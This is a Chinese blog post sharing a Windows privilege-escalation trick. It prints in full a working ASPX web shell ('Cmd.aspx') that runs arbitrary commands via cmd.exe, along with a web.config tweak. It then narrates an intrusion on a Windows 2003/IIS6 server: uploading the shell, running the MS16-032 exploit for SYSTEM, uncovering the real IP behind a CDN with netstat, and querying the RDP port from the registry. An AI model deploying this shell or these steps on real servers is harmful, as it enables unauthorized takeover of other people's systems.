2020年5月

分享一个Windows提权小技巧


当我们遇到Windows的提权的时候
php有时候安全模式执行不了
我们可以尝试asp来执行
但是如果asp也不支持的话 就可以试试net
因为现在的服务器大部分都是集成环境
例如宝塔 PHPstudy 或者护卫神
除了phpstudy的话 另外两个很大几率都是支持aspx的
但是遇到aspx无法编译的时候 可以在根目录创建一个web.config文件来试试

<!-- Web.Config 配置文件 -->

<configuration>
    <system.web>
        <customErrors mode="Off"/>
    </system.web>
</configuration>

aspx cmd文件

<%@ Page Language="C#" AutoEventWireup="true"%>
<%@ import Namespace="System.Diagnostics"%>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script runat="server" language="C#">
    protected void Page_Load(object sender, EventArgs e)
    {
        if(!IsPostBack) curdir.Text = Server.MapPath(".");
    }
    protected string RunCmd(string path, string cmd, string curdir)
    {
        string retval = "";

        try
        {
            Process p = new Process();
            p.StartInfo.FileName = path;
            p.StartInfo.UseShellExecute = false;
            p.StartInfo.WorkingDirectory = curdir;
            p.StartInfo.RedirectStandardError = true;
            p.StartInfo.RedirectStandardInput = true;
            p.StartInfo.RedirectStandardOutput = true;
            p.StartInfo.CreateNoWindow = true;
            p.StartInfo.Arguments = cmd;
            p.Start();
            p.StandardInput.WriteLine("exit");
            retval = "rn----------- 运行结果 --------------rn";
            retval += p.StandardOutput.ReadToEnd();
            retval += "rn----------- 程序错误 --------------rn";
            retval += p.StandardError.ReadToEnd();
        }
        catch (Exception err)
        {
            retval = err.Message;
        }

        return retval;
    }
    protected void Execute_Click(object sender, EventArgs e)
    {
        string path = cmdpath.Text;
        string cmd = cmdline.Text;
        string wkdir = curdir.Text;

        result.Text = RunCmd(path, cmd, wkdir);
    }
    
</script>
<html xmlns="http://www.w3.org/1999/xhtml"; >
<head runat="server">
    <title>剑眉大侠 and Cmd.aspx</title>
</head>
<body>
    <form id="form1" runat="server">
    <div style="text-align: left">
        <span style="color: #ff99ff">Cmd.aspx powered by 剑眉大侠

</span>CMD Path:<asp:TextBox ID="cmdpath" runat="server" Width="755px">c:windowssystem32cmd.exe</asp:TextBox>
CurrentDir:<asp:TextBox ID="curdir" runat="server" Width="755px"></asp:TextBox>
CMD Line:<asp:TextBox ID="cmdline" runat="server" Width="756px">/c set</asp:TextBox> <asp:Button ID="Execute" runat="server" OnClick="Execute_Click" Text="Execute" />

<asp:TextBox ID="result" runat="server" Height="460px" TextMode="MultiLine" Width="901px"></asp:TextBox></div> </form> </body> </html>

实战帮朋友提一个服务器2003+IIS6.0


博客.png

大晚上的突然搞一个shell过来
进来看到是2003+iis6.0的环境 感觉好像没啥补丁
毕竟2003基本的服务商都停掉这个系统了
组件不支持asp执行 只能试试上aspx了
2.png

好家伙 直接拒绝访问
用文件扫了一下 c d盘都没有写入权限 只能在网站根目录写了
直接上传一个exp ms16-032
结果直接秒了 卧槽
3.png

他这是直接在我嘴里种水稻阿?
但是在这里又遇到了一个问题 百度云节点
4.png

当我尝试ipconfig的之后 找不到ip地址来连接
直接输入域名就是节点ip
但是用 netstat -ano查询的时候 就找到了网站的真实ip了
5.png

然后 查了一下端口
REG query HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWinStationsRDP-Tcp /v PortNumber
6.png

完事 走人。